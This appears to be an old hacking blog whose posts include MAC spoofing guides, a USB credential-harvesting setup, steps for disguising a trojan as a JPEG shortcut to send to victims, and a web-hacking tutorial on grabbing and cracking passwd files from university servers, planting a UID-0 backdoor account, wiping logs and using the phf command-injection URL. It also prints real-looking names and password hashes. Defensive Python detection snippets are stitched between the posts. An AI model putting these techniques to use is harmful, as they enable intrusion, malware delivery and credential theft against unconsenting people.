    Showing posts with label Hacking. Show all posts

    Monday, February 6, 2012

    MAC Address Changing Tricks / MAC Spoofing

    Many people change their IP address and think they are anonymous on the internet, but they forget that they can still be tracked by their MAC address, which remains unspoofed. So what can you do? It is practically impossible to change your MAC address physically, but it can be changed virtually. SMAC is an application that can help you spoof your MAC address to maintain your anonymity on the internet.


    There are a few tools available for this.


    1. SMAC is a MAC Address Changer (Spoofer) for Windows 7, XP, Server 2003, and Vista systems, regardless of whether the manufacturers allow this option or not.


    There are other ways.



    Change the MAC address in Windows
    1. Go to Start -> Control Panel. Double-click Network Connections (inside the Network and Internet Connections category in Windows XP). Then right-click the active network connection whose network adapter's MAC address you want to change (normally Local Area Network or Wireless Network Connection) and click Properties.
      The above steps work in Windows XP, Windows 2000 and Windows Server 2003. For Windows Vista, access to the NIC’s properties is from Control Panel -> Network and Internet -> Network and Sharing Center -> Manage Network Connections.
      Alternatively, if you already know which network adapter is responsible for your network or Internet connection, go to Device Manager and open the properties dialog by double-clicking the NIC itself.
    2. In the General tab, click on the Configure button.
    3. Click on Advanced tab.
    4. In the Property section, select and highlight Network Address or Locally Administered Address.
    5. To the right, the “Not Present” radio button is selected by default. Change this by clicking the radio button for Value:, and then type in a new MAC address to assign to the NIC.
      [Figure: Change MAC Address of Network Adapter]
      The MAC address consists of 6 pairs of hexadecimal digits (0 – 9 and A – F). For example, 88-17-E8-90-E2-0A. When entering the new MAC value, omit the dash (-), for example 8817E890E20A.
    6. Click OK when done.
    7. To verify the change of MAC address, go to command prompt, then type in one of the following commands:
      ipconfig /all
      net config rdr
    8. If successful, reboot the computer to make the change effective.
    Note: To restore the original default MAC address, simply set the option back to “Not Present”.
    Change the MAC Address of NIC in Windows via Registry
    1. Open a command prompt.
    2. Type the following command and hit Enter.
      ipconfig /all
    3. Record the Description and the Physical Address (this is the MAC address) of the active network connection (discard those with Media Disconnected state).
      [Figure: Get MAC Address for Network Card]
      For example, in the figure above, Description is Intel(R) Wireless WiFi Link 4965AGN and the MAC address is in the format 00-XX-XX-XX-XX-XX.
    4. In the command prompt also, type the following command and hit Enter.
      net config rdr
    5. Record the GUID shown for the MAC address of the active connection’s NIC whose MAC address is to be changed. The GUID is contained within the { and } brackets right in front of the MAC address, as shown in the figure below.
      [Figure: GUID for the NIC]
    6. Type regedt32 or regedit in Start -> Run box or in Start Search for Windows Vista. Note: for Windows NT 4.0 and Windows 2000, regedt32 must be used.
    7. Navigate to the following registry key:
      HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}
    8. Expand the {4D36E972-E325-11CE-BFC1-08002BE10318} tree; it contains more sub-keys named 0000, 0001, 0002 and so on.
    9. Go through each sub-key starting from 0000 and look for the one whose DriverDesc value data matches the NIC description recorded in the step above, that is, the adapter whose MAC address you want to change. In most cases, it will be similar to the network adapter card name.
      To verify that the sub-key found is indeed the correct one, check the value of NetCfgInstanceId, which should be the same as the NIC’s GUID recorded in the step above.
    10. Once a sub-key is matched to the network interface card whose MAC address is to be spoofed, select and highlight the sub-key. Right-click the sub-key (for example, 0000), then select New -> String Value. Name the new value NetworkAddress.
      Note: If a NetworkAddress REG_SZ value already exists in the right pane, skip this step.
    11. Then double-click NetworkAddress and enter a new MAC address as its value data.
      [Figure: Change and Spoof MAC Address in Registry]
      Note that the MAC address is 12 hexadecimal digits and should be entered without any dash (-). For example, 1A2B3C4D5E6F.
    12. Reboot the system to make the new MAC address effective. Alternatively, if you don’t want to restart the system, try disabling and then re-enabling the network adapter in Device Manager.
    13. To verify the change of MAC address, go to command prompt, then type in one of the following commands:
      ipconfig /all
      net config rdr
    Note: To restore the true original hardware burned-in MAC address, remove the NetworkAddress registry value that was added.
    Alternative: Third-party tools and utilities to change the MAC address in the Windows operating system are plentiful, for example: SMAC (direct download link to smac20_setup.ex, supports Windows Vista, XP, 2003, 2000), Macshift (direct download link to macshift.zip, for Windows XP), BMAC (almost identical SMAC MAC changer clone by moorer-software.com), Mac MakeUp (direct download link to macmakeup.zip, for Windows 2000/XP/2003/Vista), MadMACs (MAC Address Spoofing And Host Name Randomizing App For Windows, direct download of MadMACs.zip), EtherChange (direct download link to etherchange.exe), and Technitium MAC Address Changer (for Windows 2000 / XP / Server 2003 / Vista / Server 2008).
    How to Change MAC Address (MAC Spoofing) in Linux and *nix
    To change your MAC address in Linux and most Unix-like (*nix) systems, run the following commands:
    ifconfig <interface> down
    ifconfig <interface> hw ether <MAC address>
    ifconfig <interface> up
    For example, the command looks like “ifconfig eth0 down hw ether 1A:2B:3C:4D:5E:6F”. The first command brings down the network interface, the second changes its MAC address, and the third brings the interface up again. Note that in some cases the following commands have to be used to bring the network interface down and up:
    /etc/init.d/networking stop or /etc/init.d/network stop (in the case of Fedora Core 5)
    /etc/init.d/networking start or /etc/init.d/network start (in the case of Fedora Core 5)
    Alternatively, for Fedora Core 5 Linux with the iproute2 tools installed, the following commands can also change the MAC address to the spoofed version:
    /etc/init.d/network stop
    ip link set <interface> address 1A:2B:3C:4D:5E:6F
    /etc/init.d/network start
    For example, “ip link set eth0 address 1A:2B:3C:4D:5E:6F”. To check whether the MAC address has been spoofed, use ip link ls eth0 or ip addr ls eth0 instead of ifconfig eth0.
    How to Make the Spoofed MAC Address Permanent Even After Reboot in Linux
    Edit the ifcfg-eth0 file (or other similar file if you’re changing different interface), add the following variable line to the file:
    MACADDR=12:34:56:78:90:ab
    Then run service network restart to make the change effective immediately.
    How to Make the Spoofed MAC Address Permanent on Restart in Debian
    Edit the /etc/network/interfaces file and add in the following variable line to the appropriate section so that the MAC address is set when the network device is started.
    hwaddress 02:01:02:03:04:08
    For example, “hwaddress ether 02:01:02:03:04:08”.
    Alternative: GNU MAC Changer (for Debian, Slackware, ArchLinux, Mandrake, Crux and other RPM-based distributions such as Fedora, Red Hat, CentOS, ASPLinux, SUSE Linux, OpenSUSE, etc.)
    How to Change MAC Address (MAC Spoofing) in BSD or FreeBSD
    Issue the following commands in the shell:
    ifconfig <interface> down
    ifconfig <interface> <link|ether> <MAC address>
    ifconfig <interface> up
    The first command brings down the network interface (optional), the second changes its MAC address, and the third brings the interface up again (optional). For example, the command looks like “ifconfig xl0 link 1A:2B:3C:4D:5E:6F” or “ifconfig fxp0 ether 1A:2B:3C:4D:5E:6F”.
    How to Change MAC address in Solaris
    The shell command to change the MAC address in Sun Solaris is as below:
    ifconfig <interface> ether <MAC address>

    For example, the command looks like “ifconfig hme0 ether 1A:2B:3C:4D:5E:6F”. Note that the change is temporary and does not persist after a reboot. To make this change permanent, the command can be placed in a runtime control script (/sbin/sh).
    How to Spoof MAC Address in HP-UX
    It’s possible to change MAC address using HP-UX SAM. Select Networking and Communications, then selecting the interface, then click on Action -> Modify -> Advanced Options. Finally, change the value of station address, which is MAC address name in HP-UX.
    How to Spoof and Change MAC Address in OpenBSD
    Use the following command to change MAC Address to spoofed MAC in OpenBSD (after version 3.8):
    ifconfig <interface> lladdr <MAC address>
    For example, “ifconfig bge3 lladdr 1A:2B:3C:4D:5E:6F”.
    How to Change to Spoofed MAC Address Permanently in OpenBSD
    To make the MAC address changed at boot before network connection is established, and even before parsing of hostname.* file, edit the /etc/netstart file to add in the following lines before the line of “# Now parse the hostname.* file”:
    if [ "$if" = "INTERFACE" ]; then
    ifconfig INTERFACE lladdr MAC_ADDRESS
    fi
    # Now parse the hostname.* file
    ....
    How to Change MAC Address in Mac OS X
    From Mac OS X 10.4.x (Darwin 8.x) onwards, the MAC address of a wired Ethernet interface can be altered in Apple Mac OS X in a fashion similar to the Linux and FreeBSD methods. To do so, type the following command in Terminal.app:
    sudo ifconfig en0 ether aa:bb:cc:dd:ee:ff
    or
    sudo ifconfig en0 lladdr aa:bb:cc:dd:ee:ff (for Mac OS X 10.5 Leopard)
    where en0 is the network interface (numbered from en0, en1, en2 …) and aa:bb:cc:dd:ee:ff is the desired MAC address in hex notation.
    Alternative: MacDaddy (download MacDaddyX.dmg, supports the Airport wireless adapter)
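The address notations used in this post (dashed, colon-separated, and the bare 12-digit registry form) all carry two flag bits in the first octet, which is what lets a network defender spot software-assigned addresses. The following is an added example, not part of the original post: it normalizes the three notations, decodes the flag bits, and compares sightings with an asset inventory. Host names, the inventory and the function names are assumptions made for illustration.

```python
import re

# One separator style per address: "-" (Windows), ":" (Unix) or none (registry).
_MAC_RE = re.compile(
    r"^[0-9A-Fa-f]{2}([-:]?)(?:[0-9A-Fa-f]{2}\1){4}[0-9A-Fa-f]{2}$")


def normalize_mac(text):
    """Return the address as 12 lowercase hex digits, or raise ValueError."""
    text = text.strip()
    if not _MAC_RE.match(text):
        raise ValueError(f"not a MAC address: {text!r}")
    return re.sub(r"[-:]", "", text).lower()


def classify_mac(text):
    """Decode the two flag bits carried in the first octet."""
    mac = normalize_mac(text)
    first_octet = int(mac[:2], 16)
    return {
        "mac": mac,
        # I/G bit: 1 = group (multicast) address, never valid for a NIC.
        "multicast": bool(first_octet & 0x01),
        # U/L bit: 1 = locally administered, i.e. assigned in software
        # rather than taken from a vendor's OUI block.
        "locally_administered": bool(first_octet & 0x02),
    }


def audit_observed(inventory, observed):
    """Compare (host, MAC) sightings with an asset inventory.

    inventory: {host: burned-in MAC}; observed: [(host, MAC), ...].
    Returns a list of (host, finding) tuples.
    """
    owner_of = {normalize_mac(mac): host for host, mac in inventory.items()}
    findings = []
    for host, raw in observed:
        try:
            info = classify_mac(raw)
        except ValueError:
            findings.append((host, "malformed"))
            continue
        if info["multicast"]:
            findings.append((host, "multicast-bit-set"))
        if info["locally_administered"]:
            # Also produced by OS-level Wi-Fi MAC randomization, so treat
            # it as a lead to check, not proof of spoofing.
            findings.append((host, "locally-administered"))
        if host in inventory and normalize_mac(inventory[host]) != info["mac"]:
            findings.append((host, "inventory-mismatch"))
        owner = owner_of.get(info["mac"])
        if owner is not None and owner != host:
            findings.append((host, "duplicate-of:" + owner))
    return findings


# Constructed sample data: host names and the inventory are made up. Two of
# the addresses reuse example values printed in this post; ws-02's inventory
# entry is invented.
INVENTORY = {"ws-01": "88-17-E8-90-E2-0A", "ws-02": "00-1B-21-AA-BB-CC"}
OBSERVED = [
    ("ws-01", "88:17:e8:90:e2:0a"),   # matches inventory
    ("ws-02", "1A2B3C4D5E6F"),        # registry-style override
    ("kiosk", "88-17-E8-90-E2-0A"),   # same address as ws-01
]

if __name__ == "__main__":
    for host, finding in audit_observed(INVENTORY, OBSERVED):
        print(host, finding)
```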




    Monday, January 2, 2012

    Make Your USB Device The Ultimate Hacking Tool



    Now, the other day I was just Googling a few things, and I came across a few things that might interest you.




    What if every time you inserted your thumb drive into a computer, it gave you all the sensitive data on the computer? That (and then some) is now possible. 




    First, I recommend partitioning your flash drive. Search Google for 'bootit lexar', find it, and download it. Now insert your flash drive and then run BootIt.exe, which is inside the folder you downloaded. Before going any further, back up all the data on your flash drive. Now in your BootIt window, click Flip Removable Bit. Now take out your thumb drive and re-insert it.




    Now, what you just did was reverse the bit rate of your thumb drive. Normally, Windows recognizes thumb drives as Removable Media because of thumb drives' bit rates. But when you flip the bit rate, you change it to the bit rate of a removable drive. Since Windows now recognizes your thumb drive as a removable drive, you can now partition it. 




    Now, go to Start, then Run. Type diskmgmt.msc. Now find your drive in the top box and left click it. It should appear in the bottom box. Now right click it and select Delete Partition. Once it is finished, right click it again and select New Partition. From the window that comes up, you can select how much space should be allocated to your first partition, you can give the partition a name, and also select which format the partition should be in. I recommend the FAT32 format.




    You can repeat these steps to create new partitions. 




    Now for the fun part. You can choose what you want to do with each partition. On the first one, I installed Ubuntu 8.04 Hardy Heron. On another, I put USB SwitchBlade and other programs. And on another, I put an Ophcrack Live version.




    To install Ubuntu (or another distro) on your drive, you can always Google that. 




    USB SwitchBlade is a tool created by Hak5. Once the files are copied to your drive, you can plug your drive into any computer. Once you run the program, it copies a LOT of sensitive data onto your flash drive. Each computer is separated in separate directories automatically. 




    Other USB programs can be found at Nirsoft.net and if you do a little searching (or if you already know how), you can edit an autorun file for these. I put programs such as Angry IP Scanner. You can also search Google for 'USB Programs', or you can wait a bit until I can compile a link list.




    Ophcrack can be installed easily. Just search Google. 
    *Note that the USB SwitchBlade works best under Windows XP.


    In my previous posts, you can find how to install BT on a USB drive. It will be useful too.


    How to Hide a File in an Image

    This is a good trick to hide your exe files into a jpg file.


    How about sending a trojan or a keylogger into your victim using this trick..?

    1) Firstly, create a new folder and make sure that the options 'show hidden files and folders' is checked and ‘hide extensions for known file types’ is unchecked. Basically what you need is to see hidden files and see the extension of all your files on your pc.

    2) Paste a copy of your server on the new created folder. let's say it's called 'server.exe' (that's why you need the extension of files showing, cause you need to see it to change it)

    3) Now you’re going to rename this 'server.exe' to whatever you want, let’s say for example 'picture.jpeg'

    4) Windows is going to warn you if you really want to change this extension from exe to jpeg, click YES.

    5) Now create a shortcut of this 'picture.jpeg' in the same folder.

    6) Now that you have a shortcut, rename it to whatever you want, for example, 'me.jpeg'.

    7) Go to properties (on file me.jpeg) and now you need to do some changes there.

    8) First of all delete all the text on field 'Start In' and leave it empty.

    9) Then on field 'Target' you need to write the path to open the other file (the server renamed 'picture.jpeg') so you have to write this :-
    'C:\WINDOWS\system32\cmd.exe /c picture.jpeg'

    10) The last field, 'c picture.jpeg' is always the name of the first file. If you called the first file 'soccer.avi' you got to write 'C:\WINDOWS\system32\cmd.exe /c soccer.avi'.

    11) So what you’re doing is when someone clicks on 'me.jpeg', a cmd will execute the other file 'picture.jpeg' and the server will run.

    12) On that file 'me.jpeg' (shortcut), go to properties and you have an option to change the icon. Click that and a new window will pop up and you have to write this :-
    %SystemRoot%\system32\SHELL32.dll . Then press OK.

    13) You can set the properties 'Hidden' for the first file 'picture.jpeg' if you think it’s better to get a connection from someone.

    14) But don’t forget one thing, these 2 files must always be together in the same folder and to get connected to someone they must click on the shortcut created not on the first file. So rename the files to whatever you want considering the person and the knowledge they have on this matter.

    15) For me for example I always want the shortcut showing first so can be the first file to be opened. So I rename the server to 'picture2.jpeg' and the shortcut to 'picture1.jpeg'.
    This way the shortcut will show up first. If you set hidden properties to the server 'picture.jpeg' then you don’t have to bother with this detail but I’m warning you, the hidden file will always show up inside of a Zip or a Rar file.

    16) So the best way to send these files together to someone is compress them into Zip or Rar.

    17) Inside the Rar or Zip file you can see the files' properties, and even after all this work you can see that the shortcut is recognized as a shortcut, but hopefully the person you sent this to doesn’t know that and is going to open it.
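The pair of files described in this post leaves two artefacts a mail gateway or analyst can test for: a member with a media extension whose content starts with the PE "MZ" signature, and a shell link (stored on disk with a .lnk suffix that Explorer does not display) that references cmd.exe. The following triage sketch is an added example, not part of the original post; the function names, finding labels and the stub archive it builds are assumptions, and the stub members are constructed bytes, not working files.

```python
import io
import zipfile

MEDIA_EXTS = (".jpg", ".jpeg", ".png", ".gif", ".bmp", ".avi")
# Shell Link header: HeaderSize 0x0000004C, then the LinkCLSID
# 00021401-0000-0000-C000-000000000046 in its on-disk byte order.
LNK_MAGIC = bytes.fromhex("4c000000 01140200 00000000 c0000000 00000046")
HEAD_BYTES = 64 * 1024  # enough for magic bytes and a whole shortcut


def _mentions(data, needle):
    """True if needle occurs as ASCII or UTF-16LE text, ignoring case."""
    low = data.lower()
    needle = needle.lower()
    return needle.encode("ascii") in low or needle.encode("utf-16-le") in low


def triage_zip(zip_bytes):
    """Return (member name, finding) tuples for a ZIP held in memory."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as archive:
        for info in archive.infolist():
            if info.is_dir():
                continue
            with archive.open(info) as handle:
                head = handle.read(HEAD_BYTES)
            name = info.filename
            lower = name.lower()
            # Content says "Windows executable", name says "picture/video".
            if head[:2] == b"MZ" and lower.endswith(MEDIA_EXTS):
                findings.append((name, "pe-with-media-extension"))
            if head.startswith(LNK_MAGIC):
                # A shortcut whose stored strings reference the command shell.
                if _mentions(head, "cmd.exe"):
                    findings.append((name, "shortcut-runs-cmd"))
                # A shortcut whose visible name ends in a media extension.
                stem = lower[:-4] if lower.endswith(".lnk") else lower
                if stem.endswith(MEDIA_EXTS):
                    findings.append((name, "shortcut-named-like-media"))
    return findings


def build_sample_zip():
    """Constructed test archive; none of the members is a working file."""
    fake_jpeg = b"\xff\xd8\xff\xe0" + b"\x00" * 16
    fake_pe = b"MZ" + b"\x00" * 62
    fake_lnk = (LNK_MAGIC.ljust(76, b"\x00")
                + r"C:\WINDOWS\system32\cmd.exe".encode("utf-16-le"))
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as archive:
        archive.writestr("holiday.jpg", fake_jpeg)
        archive.writestr("picture.jpeg", fake_pe)
        archive.writestr("me.jpeg.lnk", fake_lnk)
    return buf.getvalue()


if __name__ == "__main__":
    for name, finding in triage_zip(build_sample_zip()):
        print(name, finding)
```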

    Monday, December 19, 2011

    How to Face Autorun Virus with Windows 7

    Many people suffer from this virus. It is very annoying, and people are afraid to use their pen drives in a local cyber cafe. Here is a simple solution.


    1. Open Run Task (Win button + R)

    2. Type : gpedit.msc

    3. Drill down to Computer Configuration –> Administrative Templates –> Windows Components –> Autoplay Policies –> Double click the Turn off Autoplay at the right side window.

    4. There are 3 configurations available : Not Configured, Enabled, Disabled.

    5. Choose Enabled then click apply .



    That's it. This virus will stop spreading from removable media such as CD, USB, floppy, etc.

    Monday, November 16, 2009

    Remote User Creation with Admin Rights

    I came across a small trick which creates a user ID with admin privileges on the victim's computer using HTML in Windows.

    The script provided in this article will create a "User ID" on the victim's machine with "administrator" privileges. It is a local system exploit which can be tweaked to exploit systems remotely. The hacker can upload this script to any free web server and then trick the victim into visiting the link. Once the victim visits this malicious link, a user named "warrior" with password "kickass" will be created on the victim's system.

    MalScript: Sample WSH Script to create "User" with "administrator privileges"


    classid=clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B>






    You can also use it on any PC. Just make a page using this code and open it on that PC.

    It's really amazing, try it out and reply.


    Saturday, November 7, 2009

    Web Hacking An Introduction


    The Introduction on how to hack a website.

    Source: Hackers Library
    First of all you will need an FTP program such as ws_ftp. Use Voyager FTP, downloadable at http://www.windows95.com/; it’s really simple and easy to use, so try it if you haven’t dealt with FTP before. Now, once you have the program, find an address like http://www.shiga-pc.ac.jp. You can find addresses like this by going to a search engine such as AltaVista or Google and running a search for url:ac.jp, which tells the search engine to give you all the academic addresses in Japan (ac = academic, jp = Japan). You can try this with any country, e.g. url:dk. But for now let’s just focus on the Japanese servers. When you have an address (I would recommend making a list of about 100 and trying them all), go to your FTP program and type in the address, e.g. http://www.shiga-pc.ac.jp. Note: you will have to log in anonymously. You should then get a list of folders on the remote system: usr, pub, etc, dev, bin. See the etc folder? Open it. Once opened you should see some files, passwd and group. Open or view the file passwd (this is where the passwords for the system are stored). You should hopefully get something that looks like this:

    root:RqX6dqOZsf4BI:0:1:System PRIVILEGED Account,,,:/:/bin/csh
    field:PASSWORD HERE:0:1:Field Service PRIVILEGED Account:/usr/field:/bin/csh
    operator:PASSWORD HERE:0:28:Operator PRIVILEGED Account:/opr:/opr/opser
    ris:Nologin:11:11:Remote Installation Services Account:/usr/adm/ris:/bin/sh
    daemon:*:1:1:Mr Background:/:
    sys:PASSWORD HERE:2:3:Mr Kernel:/usr/sys:
    bin:PASSWORD HERE:3:4:Mr Binary:/bin:

    uucp:Nologin:4:1:UNIX-to-UNIX Copy:/usr/spool/uucppublic:/usr/lib/uucp/uucico
    uucpa:Nologin:4:1:uucp adminstrative account:/usr/lib/uucp:
    sso:Nologin:6:7:System Security Officer:/etc/security:
    news:Nologin:8:8:USENET News System:/usr/spool/netnews:
    sccs:PASSWORD HERE:9:10:Source Code Control:/:
    ingres:PASSWORD HERE:267:74:ULTRIX/SQL Administrator:/usr/kits/sql:/bin/csh

    rlembke:n25SO.YgDxqhs:273:15:Roger Lembke,,,:/usr/email/users/rlembke:/bin/csh
    rhuston:ju.FWWOh0cUSM:274:15:Robert Huston,st 304c,386,:/usr/email/users/rhuston:/bin/csh
    jgordon:w4735loqb8F5I:275:15:James.”Tiger” Gordon:/usr/email/users/jgordon:/bin/csh
    lpeery:YIJkAzKSxkz4M:276:15:Larry Peery:/usr/email/users/lpeery:/bin/csh
    nsymes:lSzkVgKhuOWRM:277:15:Nancy Symes:/usr/email/users/nsymes:/bin/csh
    llembke:yDAq2xZgzqmms:278:15:Linda Lembke:/usr/email/users/llembke:/bin/csh
    grees:eb2pQcYI0Q5UI:279:15:Gary Rees:/usr/email/users/grees:/bin/csh
    nreece:NiwrmCHzn5p7A:281:15:Neva Reece:/usr/email/users/nreece:/bin/csh
    delliott:8Q1O1LukmfXfA:283:15:Dan Elliott:/usr/email/users/delliott:/bin/csh

    erobinet:vGufhYNuhkTZ6:284:15:Eric Robinette:/usr/email/users/erobinet:/bin/csh
    mhirsch:0AgYY2.YBLj8Y:285:15:Michael Hirsch:/usr/email/users/mhirsch:/bin/csh
    schristi:yckqD6acrG2OM:289:15:Scott Christianson:/usr/email/users/schristi:/bin/csh
    pdrummon:39MW8ROgoY.T6:294:15:R.Paul Drummond:/usr/email/users/pdrummon:/bin/csh

    dbrown:fmTUonryY2mCE:295:15:Doris Brown:/usr/email/users/dbrown:/bin/csh
    This means you’ve hit the jackpot. In this case you should get a password cracker (download one at http://www.hackersweb.com, go to the hacking toolz section). I would recommend that the beginning hacker get a password cracker such as Killer Cracker because it’s extremely easy to use. Once you have downloaded Killer Cracker you will need a dictionary file (get one at http://www.hackersweb.com, look in the extra toolz section). Dictionary files are better the bigger they are, so I would recommend getting one at around 10 MB or more (basically this is brute-forcing software). Now the passwords from the passwd file off the server you are hacking: you will need to save them to a file and place them in the same directory as Killer Cracker, and you will also need to have your dictionary file in the same directory. Now you are ready to go. Just run Killer Cracker and tell it the name of the Pwfile (the password file) and the name of the word file (your dictionary file). The valid file will be the file where the output of the password cracker will be put; just give it a name such as crack.txt. Once the cracker is done cracking the password file for you, go to the valid file and take a look. The file should look something like this:

    root:root:0:1:System PRIVILEGED Account,,,:/:/bin/csh

    (remember this is an example). This file says that the username is root
    and the password is root. If the file had been like this:
    root:dumbass:0:1:System PRIVILEGED Account,,,:/:/bin/csh
    (remember again just an example) the login or username would be root and
    the password would be dumbass, well that’s it just ftp to the site using
    the login and password.  Note if you get root type in the following once
    you have logged in:-   echo “myserver::0:0:Test User:/:/bin/csh”>>etc\passwd
    this will allow you to login to the server with 1:myserver so you
    get the admin suspicious when they see people login as root.  Hide yourself
    as much as possible, if you already have a shell then go through that first
    when logging on, or telnet to the hacked site shell and then re-telnet to the
    hacked shell using the hacked shell, if you see what I mean, so your who
    appears as local host.  Also get some c scripts which delete your presence,
    erases you off logs etc.

    Now if you were not as lucky to get exactly the same password file as shown
    in the example above then maybe you got something like this.

    root:*:0:1:Operator:/:
    ftp:*:53:53:anonymous ftp:/pub:
    t2:*:201:201:Takaoka Tadashi:/pub:

    This means that the passwd file is shadowed. If this is the case then
    welcome to the administrator's world of trying to stop hackers; this is
    where you can't really do anything. However, there is one thing to try:
    sometimes, in very rare cases, there may be a folder on the remote system
    that can be accessed by an anonymous login, called shadowed, shadow, or
    secret. If this is the case the password files should be in there,
    congratulations. If there isn’t a folder like this, and the passwd file
    is shadowed, then bad luck; go to the next address on your list.
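The difference between the two listings above (hashes in the second field versus `*` or `x`) and the passwordless UID 0 entry mentioned earlier are exactly what an administrator should audit for on their own systems. The following check is an added example, not part of the original text; the function names and finding labels are assumptions, and the sample file is constructed (its last two lines mirror entries quoted in this post).

```python
LOCKED_PREFIXES = ("*", "!")  # conventional "no valid password" markers


def audit_passwd(text):
    """Return (line_no, user, finding) tuples for passwd(5)-format text."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), 1):
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append((line_no, fields[0], "malformed"))
            continue
        user, password, uid = fields[0], fields[1], fields[2]
        if password == "":
            # Anyone can log in as this account without a password.
            findings.append((line_no, user, "empty-password"))
        elif password == "x" or password.startswith(LOCKED_PREFIXES):
            pass  # hash lives in the shadow file, or the account is locked
        else:
            # World-readable hash: open to offline dictionary attack.
            findings.append((line_no, user, "hash-in-passwd"))
        if uid == "0" and user != "root":
            # A second superuser account, whatever its name.
            findings.append((line_no, user, "extra-uid0"))
    return findings


def is_fully_shadowed(text):
    """True when no account exposes a hash or an empty password field."""
    exposed = {"hash-in-passwd", "empty-password"}
    return not any(f[2] in exposed for f in audit_passwd(text))


# Constructed sample; the hash on line 3 is a made-up placeholder string.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/sh
daemon:*:1:1:daemon:/:
alice:abCONSTRUCTED:1000:1000:Alice:/home/alice:/bin/sh
smtp:x:0:0:mail daemon user:/:
myserver::0:0:Test User:/:/bin/csh
"""

if __name__ == "__main__":
    for finding in audit_passwd(SAMPLE_PASSWD):
        print(finding)
```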

    Now that you have tried the first thing as shown above there are a couple
    of other methods you may also want to try one is FTP hacking shown below.

    Go to a dos prompt after you are connected to the internet .
    Type.
    ftp www.victim=the site address
    server will ask for a username press enter
    server will ask for a password press enter
    at the prompt type quote  user ftp
    then type
    quote cwd ~root
    then type
    quote pass ftp

    If you get in make sure you delete the log file they might look at it and
    see that you were on.  Once you get on the passwd file is in etc/passwd so
    type cd etc then type get passwd.  If you have done the above right and the
    server is old you will have root access.  By the way root is the highest
    security status you can have.

    Another good way of getting root, or a shell at least, is through browser
    hacking. Again we'll use Japanese educational servers as our target. To do
    this you will need a browser such as Netscape or Internet Explorer. You
    will also need a telnet program; you can either download one at
    http://www.windows95.com or use the one that already comes with DOS.
    To access the telnet program that comes with DOS, go to your DOS window and
    type in telnet www.site.com, where site.com stands for the site you want to
    telnet to; it could be anything like www.geidai.ac.jp or
    www.tulips.tsukuba.ac.jp. You will also need a cracker program; I would
    recommend using Killer Cracker and applying it as above.

    Next, open your browser and run a search for url:ac.jp, as explained
    above. Again I would recommend making a big list of your targets. Now,
    when you have your target's web address, type it in your browser and add
    this to it:

    http://www.tagetgoeshere.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
    or
    http://www.tagetgoeshere.com/cgi/phf?Qalias=x%0a/bin/cat%20/etc/passwd
    To all you out there who are slightly advanced, I know this is the phf
    technique and it is virtually dead, but you’ll be surprised where you can
    use this.

    This technique of finding the password file was first used in November 1996
    on the fbi.gov webpage by a few hackers. It has been patched up by a lot of
    servers, so this won’t work on something like www.nasa.gov or most of the
    www.*.com sites.  But still works on many university servers outside Europe
    and the U.S.
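Requests of the form shown above are easy to recognise in a web server's access log: the path ends in phf and the query string carries an encoded newline (%0a) followed by a second command. The following log check is an added example, not part of the original text; it assumes Common Log Format, and the function name, severity labels and sample lines (documentation-range IP addresses) are constructed for illustration.

```python
import re
from urllib.parse import unquote, urlsplit

# Common Log Format: host ident user [time] "METHOD target PROTO" status size
CLF = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3}) (\S+)')


def find_phf_probes(lines):
    """Return one dict per request whose path ends in /phf."""
    hits = []
    for line in lines:
        match = CLF.match(line)
        if not match:
            continue
        client, when, _method, target, status, _size = match.groups()
        parts = urlsplit(target)
        if not unquote(parts.path).lower().endswith("/phf"):
            continue
        query = unquote(parts.query)          # turns %0a into a real newline
        injected = "\n" in query or "\r" in query
        status = int(status)
        if injected and status == 200:
            severity = "high"     # the script exists and answered the probe
        elif injected:
            severity = "medium"   # probe seen, script absent or blocked
        else:
            severity = "low"      # phf requested without an injected newline
        hits.append({
            "client": client,
            "time": when,
            "status": status,
            "decoded_query": query,
            "severity": severity,
        })
    return hits


# Constructed log lines for demonstration only.
SAMPLE_LOG = [
    '192.0.2.10 - - [07/Nov/2009:10:00:01 +0000] "GET /index.html HTTP/1.0" 200 1043',
    '198.51.100.7 - - [07/Nov/2009:10:00:05 +0000] '
    '"GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 404 207',
    '198.51.100.7 - - [07/Nov/2009:10:00:06 +0000] '
    '"GET /cgi/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 200 1820',
    '192.0.2.44 - - [07/Nov/2009:10:02:30 +0000] '
    '"GET /cgi-bin/phf?Qalias=smith HTTP/1.0" 200 512',
]

if __name__ == "__main__":
    for hit in find_phf_probes(SAMPLE_LOG):
        print(hit["severity"], hit["client"], repr(hit["decoded_query"]))
```

A "high" result means the script is still installed and reachable, so the fix is to remove phf from the CGI directories, not only to block the client.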

    O.K.  Once the url is entered you will see a number of things:-
    Error 404
    Cgi-bin/phf is not found on this server (the most common one)
    Or
    Warning
    You do not have permission to view cgi-bin/phf?/ on this server
    There are a number of other things the server might say, but the thing you
    want it to say is this:-

    Query Results
    /usr/local/bin/ph -m alias=x /bin/cat /etc/passwd
    root:2hjh34b4hj:0:1:0000-Admin(0000):/:/bin/sh
    daemon:fghfhijyjk:1:1:0000-Admin(0000):/:
    bin:fghfed7tfndgh:2:2:0000-Admin(0000):/usr/bin:/bin/csh
    sys:fdn7:3:3:0000-Admin(0000):/:
    adm:dehf6:4:4:0000-Admin(0000):/var/adm:
    wnn:dfhfnv:5:5:0000-Admin(0000):/var/adm:
    news:detdc:6:6:0000-Admin(0000):/usr/lib/news:
    lp:qwwos:71:8:0000-lp(0000):/usr/spool/lp:
    smtp:cmvof:0:0:mail daemon user:/:
    uucp:lcocbe:5:5:0000-uucp(0000):/usr/lib/uucp:
    nuucp:pelebd:9:9:0000-uucp(0000):/var/spool/uucppublic:/usr/lib/uucp/uucico
    listen:eoend:37:4:Network Admin:/usr/net/nls:
    nobody:ccvjcvj:60001:60001:uid no b

    etc.
    This means you have hit the jackpot!!!
    If you get something similar to this but all lines have something in common
    like the following:-

